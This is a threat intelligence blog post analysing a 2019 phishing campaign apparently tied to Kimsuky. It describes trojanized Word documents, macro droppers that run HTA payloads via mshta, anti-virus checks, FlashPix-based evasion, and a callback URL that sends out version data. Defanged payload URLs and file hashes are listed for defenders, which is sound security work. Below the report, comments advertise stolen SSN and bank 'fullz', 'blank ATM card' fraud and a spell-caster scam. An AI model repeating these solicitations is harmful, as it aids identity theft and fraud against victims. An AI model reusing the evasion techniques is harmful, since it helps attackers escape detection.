Wednesday, September 11, 2019

Autumn Aperture Report

Autumn Aperture: Threat Campaign Highlights New Evasion Technique using an Antiquated File Format  


Overview

In what is assessed to be an expansion of a coordinated effort to target U.S.-based entities, an emerging and increasingly sophisticated campaign employing obscure file formats poses significant risk — and highlights the need for vigilance around third-party relations. 

After detecting several related trojanized documents — all discussing nuclear deterrence, North Korea’s nuclear submarine program, and North Korean economic sanctions — Prevailion has determined the existence of a coordinated threat campaign. We have dubbed the campaign “Autumn Aperture” and have associated it — with moderate confidence — to the Kimsuky, a.k.a. “Smoke Screen”, threat actors. 

To increase the effectiveness of their campaign, the threat actors obtained documents written by industry experts. The threat actors then appended their malware into these Microsoft Word files. Document metadata indicates that these operations occurred throughout the summer of 2019 with the most recent wave of documents likely being sent around 20 August 2019. 

This campaign also denoted an evolution in the threat actors’ techniques, as they shifted to more obscure file formats (Kodak FlashPix), resulting in a significantly lower detection rate by anti-virus (AV) products.

We hypothesize that these documents, sent via a socially engineered email, would have likely been anticipated by the intended victims, thus increasing the threat actors’ chance of success. Some document examples include:

  • Trojanizing a conference speaker’s notes after his presentation at Nuclear Deterrence summit.
  • Trojanizing a report from a U.S. university affiliate discussing North Korea’s new ballistic missile submarine (SSB) capabilities.
  • Impersonating the U.S. Department of Treasury and sending a renewal notice for a sanctions license. 

Autumn Aperture’s increasingly sophisticated tools still employ the use of a common email threat delivery mechanism that can be incorporated into an organization’s risk mitigation plans. Given the scope of entities targeted by this campaign, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. 

Based on the indicators of compromise we’ve collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediately contact the appropriate IT or network security resource if they are prompted to enable macros on any document. 

Technical Details

Trojanized Documents

The most recent document associated with this campaign was titled “NK new SSB shown with Kim 22-7-2019”. Document metadata shows that this document was created by a U.S. based university affiliate and, despite its title, was modified on 20 August by the threat actors. 

Consistent with historical trends, the threat actors continued to trojanize genuine documents. Throughout this campaign, when victims viewed the documents in an application, the malware would display a prompt to enable macros. Once macros were enabled, the document would then display the content — in this case, a report on the construction of a new ballistic missile submarine (SSB) facility — while surreptitiously installing additional malware on the victim's computer. 


SSB phishing lure used to target victims

We also discovered another malicious document, likely deployed earlier this summer. This document used the same technique embedding images with instructions to enable macros. 

Once macros were enabled, the user would see a document that appeared to be from the U.S. Treasury Department, which granted the Carnegie Corporation of New York a sanctions license. As before, enabling macros allowed the malware to install additional payloads on the victim’s computer.


North Korea sanctions regulations lure

In one particular case, we identified a Bitly link that was sent to some victims of this campaign. When the Bitly link was expanded, it revealed the shortened actor-controlled URL. Additionally, this expansion page showed how many people clicked the link and when it was clicked. If a victim visited the URL, the resulting webpage would download a file rar, which contained a trojanized document summarizing a talk from the Nuclear Deterrence summit.



While we observed multiple iterations of this lure, metadata shows that the original document was created by a speaker at the Nuclear Deterrence Summit and then modified by the threat actors. The content of this lure suggests that it was likely targeted towards conference attendees and/or others who had an interest in what took place at the conference. 

This particular document was previously referenced in a report by ESTSecurity, and its embedded domain was included in a report by the Agence Nationale de la Sécurité des Systèmes d'Information (ANSSI). This indicates that the Autumn Aperture campaign was likely a continuation of a previously reported activity from this threat group.  


Nuclear Deterrence summit lure

Visual Basic Scripts and Kodak FlashPix Format Files

Earlier in 2019, the trojanized documents contained a very small, simple macro that would automatically open, then call mshta.exe to run an executable HTML (HTA) file. The threat actors have since fortified their documents with several new functionalities, such as an added feature to enumerate the host machine and experimented with password protecting their documents.



Another feature would call Windows Management Instrumentation (WMI) to determine if it was safe to obtain the next payload on the host machine. The dropper would obtain a list of running processes and services, then compare that output to a list of known anti-virus products. In July, the script would check for the presence of the following anti-virus products:
  • Malware Bytes
  • WIndows Defender 
  • Mcafee

In August, the threat actors added functionality to also check for: 
  • Sophos
  • TrendMicro

Screenshot of the anti-detection checks used in the July Campaign

Once the dropper determined that it was safe to run on the host machine, it would perform some host-based enumeration by attempting to obtain stored credentials. As in earlier campaigns, the dropper would use mshta.exe to obtain the HTA payloads hosted on compromised domains. The executable would be saved in %APPDATA%\tmp0.bat. The script would then create a scheduled task to run the payload using wscript.exe.

The last new feature of the script would attempt to obtain the application’s version number — in most cases this would likely be the version of Microsoft Word — and then send the result to another actor-compromised domain, pirha[.]net/p/php?op=[version number].


Screenshot of the application version feature

To hide this new functionality, the threat actor embedded it in a Kodak FlashPix file format (FPX). According to VirusTotal testing, the FPX file format has a significantly lower dectection rate, dropping the initial detection rate to 8/57 AV products. Whereas the standard file format, VBA, had an initial detection rate of  23/57.


Screenshot of the FPX detection rate on 23 July 2019


Screenshot of the VBA detection rate on 9 June 2019

This was likely done as AV products have numerous signatures designed to inspect VBA files; while FPX files have not received the same level of scrutiny. As a result, FPX files are less likely to be subsequently flagged as malicious. We found samples suggesting that the threat actors have been using this file format since at least July.

Conclusion 

These threat actors’ TTPs are evolving and continue to be refined with each new operation. While this type of operation did require some user interaction (pressing the macro button), the malware would do the rest in the background, hidden from the victim. 

This technique followed a wider trend that we are observing across multiple threat actor groups, in which they socially engineer victims with an image rather than relying on an exploit. Several actors are creating more robust droppers to better protect their tool sets and increase their chances of operating without discovery. These changes reflect a highly motivated threat actor, likely to continue performing operations.

While the TTPs continue to evolve and increase in sophistication, this campaign still relies on a relatively simple but effective email fraud attack method. Business email compromise (BEC) — the traditional document delivery method used for campaign Autumn Aperture — is the leading driver for insurance giant AIG’s Europe, Middle East & Africa (EMEA) region cyber insurance claims. 

BEC compromises are a growing threat, up from 11% of AIG EMEA’s reported cyber claims in 2017 to account for 23% in 2018. AIG EMEA’s 2018 cyber claims data indicates a wide range of sectors are vulnerable to BEC attacks, with professional services, financial services, business services, and public entity & non-profit industries accounting for almost 60% of all 2018 claims.  

Given the broad scope of entities targeted by Autumn Aperture, there is an increased likelihood that a third party within an organization’s ecosystem is at risk of exposure. Based on this information and the indicators of compromise Prevailion has collected on Autumn Aperture, we encourage organizations to assess existing risk profiles, review emergency response plans, and ensure that employees know to immediate contact the appropriate IT or network security resource if prompted to enable macros on a downloaded document. For more information about threat modeling and 3rd party risk mitigation, attending Elizabeth’s talk on September 12th at the Tactical Edges International CISOs Summit. (1)

(1) Cyber Claims: GDPR and business email compromise drive greater frequencies; https://www.aig.co.uk/content/dam/aig/emea/regional-assets/documents/aig-cyber-claims-2019.pdf


Indicators of Compromise 


File Hashes
039285c83a25291bd91608daaac2941e4abc4c6eff97e02fe0991918e101201f
Bfca0a3a506b770948475b09bee6e5613e2080e37802b52f8162366a83c4c3ae
a09aec4ecafabb4ae607bb25cbdb96f00ccc1d2dd49e941e07cd4ad292a58441
E8145f09c83163bbe429f5a5c282b57e7921e7b40339820389522146516604b1
c60e9c71460e4f583da8179a606eb2f84412e003b00096c9f699fa3d2854eb7b
D1b5d606c866c304c3eb28fc52ed700c6b292e6e4387e0dac1a895e231bfe5b3
9255280904f85d01545d295a31038678d697325385be6c7c01435d541f16b043
23c18fe6675b4dad5e1354718fa9bbb096ded4293948d318d0057b51642c4cbb
63c45dd760256bb2bee1eeb9e7d61601c90a752ff46832df39ca1a8d2376b281
Aead266f97c936799f4d5f526482d41f74daf86f8fcf49976eecbc6260b59274
327426b389a87fb41c5150f18c8a3b1b5c671eb08107a3a6917baea3db686555
Bf838c2e46696f79964709e29880604d7172f2a3ab0f3f41d7ff8216f053c557
0dc17133b9d54b8d38f5a4f4c49eb0cee7ff2c80b1ea614fb59ca49c3721440b
F408dee7fa76179d826885c5c6f38acbcc11f3e3abba1f1f58068cdf833b4317
3b2701a7d49a8d6002a2a202bac9b18b4bc917009da01591ab5b66f183f9c8e9
01313c4e2c821d7d57ec5d60a7b4f6364e3a0cb3715e8a626853dd9a8ef005b7
Fc3a75ace13d53d00aef19b7b72b2742ecf5734292680d3106176cf64d1fee18
B862add44ef0d3418aa82fd674da2d7446c7a293844a4986414f96d8aae2d58f
Dc5d140c772a63252753f51f98feb4066996a1bc77ff13aa77d4764fccd01cd4
4aaaaf94ba870fa7b500883154c7da1f9639ecdd76af42ee9fe408970d6f24d3
82286cf6369eddd2e79d005a435623abe2db642c216d38550411865acf84210e
9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1
Ac4f6bdd6d4ef009f1108c4c8a3d58e0a19d4f73b239202dd601b0aeba5ceb54
F602b7ed04cd538bead5a7fe79913ea273546a996baee33fedf2ecd417efae78
Ad0d0c84025f978975a7cdde4eabc2457ba414a696601d33ea6e071bbbfbf5f3
5531d6a9b70c612a897a80b43d001f9329badb8b26be27d14645f42abb689400

URLs 
hxxps://pirha[.]net/1.php?op=
hxxps://somalidoc[.]com/generator/data/js/Vamva0[.]hta
hxxps://www[.]webfindsolucoes[.]com/wp-includes/widgets/fred/Rnlnb0[.]hta
hxxps://www[.]eventosatitlan[.]com/includes/includes/js/ja/Qbjoo0[.]hta
hxxps://www[.]atnitalia[.]com/wp-includes/js/tinymce/utils/share/Lfvbu0.hta
hxxp://atnitalia[.]com/wp-includes/js/tinymce/utils/share/upload[.]php
hxxp://evangelia[.]edu/image/bin/Rjboi0[.]hta
hxxps://login-main[.]bigwnet[.]com/attachment/view/Msgxo0[.]hta


About Prevailion

Prevailion is a compromise intelligence company, transforming the way organizations approach risk mitigation and business decision-making. Through next-level tailored intelligence and a zero-touch platform, Prevailion provides confirmed evidence of compromise for customers and their partner ecosystems.

To learn more about Prevailion, visit prevailion.com.

8 comments:

  1. Great article. I learned lot of things. Thanks for sharing.
    pdf to jpg converter free

    ReplyDelete
  2. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & will give discounts to them.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores.

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    ->Bulk order will be preferable
    ->Minimum order 25 to 30 leads/fullz
    ->Hope for the long term business
    ->You can asked for specific states & zips
    ->You can demand for samples if you want to test
    ->Data will be given with in few mins after payment received
    ->Payment mode BTC, PAYPAL & PERFECT MONEY

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  3. GET RICH WITH BLANK ATM CARD,([email protected]) I’m here to testify about Mr alex blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no job.I saw so many testimony about how Mr alex send them the blank ATM card and use it to collect money in any ATM machine and become rich. I email him also and he sent me the blank ATM card. I have use it to get $100,000. This blank ATM card can withdraw up to $10,000 daily without having any Bank Account. Mr Alex is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. This card works worldwide and I am happy now with my family through Mr Alex blank ATM card which changed my life and my family for good. Don't wait for a miracle contact Mr Alex now via his email address: [email protected]

    ReplyDelete
  4. GET RICH WITH BLANK ATM CARD,([email protected]) I’m here to testify about Mr alex blank ATM cards which can withdraw money from any ATM machines around the world. I was very poor before and have no job.I saw so many testimony about how Mr alex send them the blank ATM card and use it to collect money in any ATM machine and become rich. I email him also and he sent me the blank ATM card. I have use it to get $100,000. This blank ATM card can withdraw up to $10,000 daily without having any Bank Account. Mr Alex is giving out the card just to help the poor. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. This card works worldwide and I am happy now with my family through Mr Alex blank ATM card which changed my life and my family for good. Don't wait for a miracle contact Mr Alex now via his email address: [email protected]

    ReplyDelete
  5. PLEASE READ!!Hello Guys!!!I am Caro I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from Adriano. My blank ATM card can withdraw $4,000 daily. I got it from Him last week and now I have withdrawn about $10,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met Adriano because I met Five persons before him and they could not help me. But am happy now Adriano sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to Adriano because he changed my story all of a sudden. The card works in all countries that is the good news Adriano’s email address is [email protected]

    ReplyDelete
  6. PLEASE READ!!Hello Guys!!!I am Caro I live in Ohio USA I’m 32 Years old, am so happy I got my blank ATM card from Adriano. My blank ATM card can withdraw $4,000 daily. I got it from Him last week and now I have withdrawn about $10,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met Adriano because I met Five persons before him and they could not help me. But am happy now Adriano sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to Adriano because he changed my story all of a sudden. The card works in all countries that is the good news Adriano’s email address is [email protected]

    ReplyDelete
  7. Selling USA FRESH SPAMMED SSN Leads/Fullz, along with Driving License/ID Number with EXCELLENT connectivity.

    **PRICE**
    >>2$ FOR EACH LEAD/FULLZ/PROFILE
    >>5$ FOR EACH PREMIUM LEAD/FULLZ/PROFILE

    **DETAILS IN EACH LEAD/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYEE DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    >All Leads are Tested & Verified.
    >Invalid info found, will be replaced.
    >Serious buyers will be welcome & I will give discounts for bulk orders.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores
    >Bulk order will be preferable
    >Minimum order 20 leads/fullz
    >Hope for the long term business
    >You can asked for samples, specific states & zips (if needed)
    >Payment mode BTC, PAYPAL & PERFECT MONEY

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ''OTHER GADGETS PROVIDING''

    >SSN Fullz
    >Dead Fullz
    >Carding Tutorials
    >Hacking Tutorials
    >SMTP Linux Root
    >DUMPS with pins track 1 and 2
    >Sock Tools
    >Server I.P's
    >USA emails with passwords (bulk order preferable)

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  8. My husband and I have been having lots of problems living together, he never gives me attention or makes me happy because he has fallen in love with another woman outside our marriage. I tried my best to make sure that my husband leaves this woman but the more I talk to him about it the more he makes me feel sad and unhappy, My marriage started leading to divorce because he no longer gives me attention. I wanted to forget him but i love him and didn't want to lose him. We have been married for years and he is all I could call a true best friend and best in all, the man that handles my problems perfectly, the man that makes sacrifices for ,my happiness. I wanted him back in my life badly and I was so confused. My Friends told me to buy books about relationships, so I went online for relationship books while I came across a spell caster called Dr Emu. I read testimonies and reviews about him so I contacted him immediately, explained my problems to him. Same day , he casted a spell for me and assured me for 2 days that my husband will return to me and to my greatest surprise the third day my husband came knocking on my door and begged for forgiveness. I am so happy that my love is back again and not only that, we are about to get married again, he proposed. I wouldn't stop talking about him. Contact him today if you need his help via email: [email protected] and you will see that your problem will be solved without any delay. Website: https://emutemple.wordpress.com/

    ReplyDelete

The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...